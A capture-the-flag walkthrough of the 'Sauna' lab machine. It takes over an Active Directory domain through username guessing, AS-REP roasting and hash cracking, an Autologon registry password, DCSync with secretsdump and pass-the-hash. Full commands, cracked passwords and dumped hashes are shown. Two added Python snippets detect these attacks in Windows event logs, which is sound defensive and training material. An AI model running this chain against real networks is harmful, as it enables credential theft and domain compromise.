TL;DR
- Create a wordlist of usernames from the information on the website
- ASRepRoasting: ask for a TGT for an account without Kerberos pre-authentication and crack the password with JohnTheRipper
- Find the Autologon service account
- Simulate the behavior of a Domain Controller (DCSync) to retrieve the Administrator’s NT hash
- Pass the hash to log in as Administrator
User.txt
Reconnaissance
Let’s start with an Nmap scan:
magnussen@funcMyLife:~/sauna$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN sauna.txt 10.10.10.175
Nmap scan report for sauna.htb (10.10.10.175)
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2020-03-28 17:20:54 CET for 268s
Not shown: 65520 filtered ports
Reason: 65520 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-03-28 23:25:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3269/tcp open tcpwrapped syn-ack ttl 127
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56267/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
64432/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35558/tcp): CLEAN (Timeout)
| Check 2 (port 64287/tcp): CLEAN (Timeout)
| Check 3 (port 58329/udp): CLEAN (Timeout)
| Check 4 (port 57297/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-29 00:26:02
|_ start_date: 1601-01-01 00:09:21
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 17:25:22 2020 -- 1 IP address (1 host up) scanned in 269.24 seconds
So we find some useful services:
- DNS (53)
- IIS (80)
- Kerberos (88)
- RPC (135, 593)
- SMB (139, 445)
- LDAP (389, 636, 3269)
We also find the domain: EGOTISTICAL-BANK.LOCAL
Let’s start by visiting the website:
The website is pretty empty, but we find an interesting page where the team members are listed.
User enumeration (think like an admin)
We know there is an Active Directory with Kerberos.
One common technique against Kerberos is to look for users that have the ‘Do not require Kerberos preauthentication’ property set.
When that option is set, the KDC issues a TGT without requiring an authenticator (a timestamp encrypted by the client, proving it knows the password). The encrypted part of the AS-REP, which carries the session key, is protected with a key derived from the user’s password (for RC4-HMAC, the NTLM hash itself), so we can crack it offline with JohnTheRipper.
Previously we found a probable list of users, but the format is Firstname Lastname, which is rarely used as an identifier in an Active Directory.
The three most used identifier formats are (the two parts can be separated by a dot or a hyphen):
- Firstname Lastname (Example: JohnDoe)
- First Letter of the Firstname + Lastname (Example: JDoe)
- Three First Letters of the Firstname + Three First Letters of the Lastname (Example: JohDoe)
We generate the following wordlist:
fergussmith
fergus.smith
fergus-smith
FERGUSSMITH
FERGUS.SMITH
FERGUS-SMITH
FergusSmith
Fergus.Smith
Fergus-Smith
fsmith
f.smith
f-smith
FSMITH
F.SMITH
F-SMITH
FSmith
F.Smith
F-Smith
fersmi
fer.smi
fer-smi
FERSMI
FER.SMI
FER-SMI
FerSmi
Fer.Smi
Fer-Smi
hugobear
hugo.bear
hugo-bear
HUGOBEAR
HUGO.BEAR
HUGO-BEAR
HugoBear
Hugo.Bear
Hugo-Bear
hbear
h.bear
h-bear
HBEAR
H.BEAR
H-BEAR
HBear
H.Bear
H-Bear
hugbea
hug.bea
hug-bea
HUGBEA
HUG.BEA
HUG-BEA
HugBea
Hug.Bea
Hug-Bea
stevenkerb
steven.kerb
steven-kerb
STEVENKERB
STEVEN.KERB
STEVEN-KERB
StevenKerb
Steven.Kerb
Steven-Kerb
skerb
s.kerb
s-kerb
SKERB
S.KERB
S-KERB
SKerb
S.Kerb
S-Kerb
steker
ste.ker
ste-ker
STEKER
STE.KER
STE-KER
SteKer
Ste.Ker
Ste-Ker
shauncoins
shaun.coins
shaun-coins
SHAUNCOINS
SHAUN.COINS
SHAUN-COINS
ShaunCoins
Shaun.Coins
Shaun-Coins
scoins
s.coins
s-coins
SCOINS
S.COINS
S-COINS
SCoins
S.Coins
S-Coins
shacoi
sha.coi
sha-coi
SHACOI
SHA.COI
SHA-COI
ShaCoi
Sha.Coi
Sha-Coi
bowietaylor
bowie.taylor
bowie-taylor
BOWIETAYLOR
BOWIE.TAYLOR
BOWIE-TAYLOR
BowieTaylor
Bowie.Taylor
Bowie-Taylor
btaylor
b.taylor
b-taylor
BTAYLOR
B.TAYLOR
B-TAYLOR
BTaylor
B.Taylor
B-Taylor
bowtay
bow.tay
bow-tay
BOWTAY
BOW.TAY
BOW-TAY
BowTay
Bow.Tay
Bow-Tay
sophiedriver
sophie.driver
sophie-driver
SOPHIEDRIVER
SOPHIE.DRIVER
SOPHIE-DRIVER
SophieDriver
Sophie.Driver
Sophie-Driver
sdriver
s.driver
s-driver
SDRIVER
S.DRIVER
S-DRIVER
SDriver
S.Driver
S-Driver
sopdri
sop.dri
sop-dri
SOPDRI
SOP.DRI
SOP-DRI
SopDri
Sop.Dri
Sop-Dri
AD pentesting 101: ASRepRoasting and weak password
Let’s hope that one of these accounts exists and has the ‘Do not require Kerberos preauthentication’ property set.
magnussen@funcMyLife:~/sauna$ GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile wordlist.txt -format john -outputfile tgt.txt -dc-ip 10.10.10.175
It seems that the user FSmith fulfills our needs.
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:89bb00d717574d4672657e868d32e210$47e03c9263f2b670dd43b589926f52e9f4ff7115f6eb8f441326d84f0e66013db989c1b544a75d886dcebec3e86f73d412254d60fba76c0902cb74087aad6fd1ef83caf049e32c2b0d37220329542181a1b87bd2a5f18e3150da42debc463e0bb31586270d48473cddcb3578da18d147adbab0d8a398a85421312234f882bbc48abdf3eaa9c29c9a1cd321a3970e8d2670253c1131bf27c8b433486769220ec1654501f019b875296d63d0d2ebc980c781db408f51142ea8f7062d4eddd18ffe611384e86e15d4ff26a5f45920080d78929159ba4d7bec55a3981d02f0721c6158fb765a6e260d81f431a7029d4e07e4ba7f8a100998d8a4be4bd1b2334dc194
Let’s try to crack the AS-REP hash with JohnTheRipper:
magnussen@funcMyLife:~/sauna$ john --wordlist=rockyou.txt tgt.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:Thestrokes23
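The defender’s view of the two steps above (username guessing through the KDC, then AS-REP roasting), as an added example that is not part of the original writeup: it runs over constructed Windows Security event 4768 records (the client addresses are assumed) and flags both the burst of unknown-principal failures and the TGT issued without pre-authentication.

```python
"""Flag AS-REP roasting in Windows Security event 4768 (Kerberos TGT requested).

Constructed sample records, not telemetry from the box: the dict keys follow
the 4768 event XML field names. Status 0x6 is KDC_ERR_C_PRINCIPAL_UNKNOWN,
PreAuthType 0 means the KDC issued the TGT without pre-authentication, and
TicketEncryptionType 0x17 is RC4-HMAC (keyed directly from the NT hash).
"""
from collections import Counter


def _event(user, ip, status, preauth, etype):
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


# A wordlist being tried against the KDC produces a burst of 0x6 failures
# from one source (failed requests log PreAuthType "-" and etype 0xffffffff),
# followed by one success with no pre-authentication for the roastable user.
# 10.10.14.5 and 10.10.14.22 are constructed client addresses.
EVENTS = [_event(u, "10.10.14.5", "0x6", "-", "0xffffffff")
          for u in ("fergussmith", "hugobear", "stevenkerb", "shauncoins", "bowietaylor")]
EVENTS += [
    _event("fsmith", "10.10.14.5", "0x0", "0", "0x17"),   # roastable account, RC4
    _event("hsmith", "10.10.14.22", "0x0", "2", "0x12"),  # normal logon, AES256
]


def asrep_without_preauth(events):
    """Successful TGT issuance with no pre-authentication: the AS-REP can be
    cracked offline. RC4 tickets are the cheapest to crack, so rate them high."""
    hits = []
    for e in events:
        if e["Status"] == "0x0" and e["PreAuthType"] == "0":
            severity = "high" if e["TicketEncryptionType"] == "0x17" else "medium"
            hits.append((e["TargetUserName"], e["IpAddress"], severity))
    return hits


def enumeration_sources(events, threshold=5):
    """Client addresses with at least `threshold` unknown-principal failures,
    the fingerprint of username guessing against the KDC."""
    failures = Counter(e["IpAddress"] for e in events if e["Status"] == "0x6")
    return {ip: n for ip, n in failures.items() if n >= threshold}


if __name__ == "__main__":
    print("AS-REP without pre-auth:", asrep_without_preauth(EVENTS))
    print("Enumeration sources:", enumeration_sources(EVENTS))
```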
Let’s try to connect to this account with evil-winrm:
magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u FSmith -p Thestrokes23 -i 10.10.10.175
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
User access, done!
I AM ROOT
SeChangeNotifyPrivilege & autologin
Let’s check our user’s privileges:
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Nothing really interesting, except SeChangeNotifyPrivilege (Bypass traverse checking), which is granted to every user by default and might allow some directory traversal.
Even though we might not have permissions on a directory, we might be able to read files located further down in that directory tree.
Let’s see if some account has the Autologon feature activated.
Originally, I searched for passwords in the Registry, but the output is too big to put here; here’s the command anyway:
reg query HKLM /f password /t REG_SZ /s
*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368
ShutdownFlags REG_DWORD 0x80000027
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
Pretty simple, we retrieve the account: svc_loanmanager:Moneymakestheworldgoround! (the DefaultUserName value reads svc_loanmanager, but the account that actually exists in the domain is svc_loanmgr, which is the one we use below.)
DCSync
Let’s connect to this account and gather data for BloodHound:
magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.10.10.175
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-BloodHound -CollectionMethod All -DomainController EGOTISTICAL-BANK.LOCAL -LdapUser svc_loanmgr -LdapPass Moneymakestheworldgoround! -IgnoreLdapCert
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
Directory: C:\Users\svc_loanmgr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2020 12:03 PM 9287 20200402120337_BloodHound.zip
-a---- 4/2/2020 12:01 PM 972811 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200402120337_BloodHound.zip
Info: Downloading C:\Users\svc_loanmgr\Documents\20200402120337_BloodHound.zip to 20200402120337_BloodHound.zip
Info: Download successful!
We retrieve the following graph in BloodHound.
The user svc_loanmgr has the GetChangesAll and GetChanges privileges; with these permissions we’ll be able to perform a DCSync attack on this box.
We’ll use secretsdump.py from Impacket.
DCSync is a command within Mimikatz that an attacker can leverage to simulate the behavior of a Domain Controller. It allows the attacker to pretend to be a Domain Controller and ask other DCs for user password data through directory replication. We need the following permissions to perform the attack: Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.
magnussen@funcMyLife:~/sauna$ secretsdump.py -just-dc svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:14f2712b1fc067c07340674f336a59a1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:1fe7419bf3ddce9b30663ab860cbd2411462db6f451a9b08fee43b43d264715f
SAUNA$:aes128-cts-hmac-sha1-96:445f4b4c51415ca8dbfeca3a8c945a23
SAUNA$:des-cbc-md5:c19d13852ce3df9e
[*] Cleaning up...
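The detection side of the replication rights just used, as an added example that is not part of the original writeup: it runs over constructed Windows Security event 4662 records (the DC account name SAUNA$ comes from the dump above; the other subjects and the non-replication GUID are assumed) and flags Control Access operations that request a replication right from any principal that is not a domain controller.

```python
"""Flag DCSync-style replication in Windows Security event 4662 (operation on
an AD object).

Constructed sample records, not telemetry from the box. Event 4662 is only
emitted when the 'Audit Directory Service Access' subcategory is enabled and
the domain object carries a SACL covering the replication control-access rights.
"""
import re

# Extended-right GUIDs that let a principal pull directory secrets over
# DRSUAPI (what secretsdump.py -just-dc exercises).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals that legitimately replicate: domain controller computer accounts.
DOMAIN_CONTROLLERS = {"SAUNA$"}

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def _event(subject, access_mask, *guids):
    # Properties is logged as "%%7688" (Control Access) followed by the
    # requested right GUIDs, one per line, mirroring the real event text.
    props = "%%7688\n\t" + "\n\t".join("{%s}" % g for g in guids)
    return {"SubjectUserName": subject, "AccessMask": access_mask, "Properties": props}


EVENTS = [
    _event("SAUNA$", "0x100", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),   # DC replicating: normal
    _event("svc_loanmgr", "0x100", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
           "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),                         # user account replicating
    _event("fsmith", "0x10", "deadbeef-0000-4000-8000-000000000001"),      # constructed non-replication read
]


def dcsync_candidates(events, dcs=DOMAIN_CONTROLLERS):
    """Return (subject, [right names]) for Control Access (0x100) operations that
    request a replication right from an account that is not a domain controller."""
    hits = []
    for e in events:
        if e["AccessMask"] != "0x100" or e["SubjectUserName"] in dcs:
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(e["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if rights:
            hits.append((e["SubjectUserName"], rights))
    return hits


if __name__ == "__main__":
    for subject, rights in dcsync_candidates(EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```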
Let’s do some pass the hash: we won’t even have to crack the password to connect as Administrator!
magnussen@funcMyLife:~/sauna$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
01/23/2020 04:11 PM <DIR> .
01/23/2020 04:11 PM <DIR> ..
01/23/2020 11:22 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 7,139,856,384 bytes free
C:\Users\Administrator\Desktop>type root.txt
f3ee04965c68257382e31502cc5e881f
This was my first Windows machine, and I’ve learned a lot about Kerberos and Active Directory environments. I still have a lot to learn about Windows and Active Directory attacks, but it was a really great introduction!
Thanks Egotisticalsw for the box!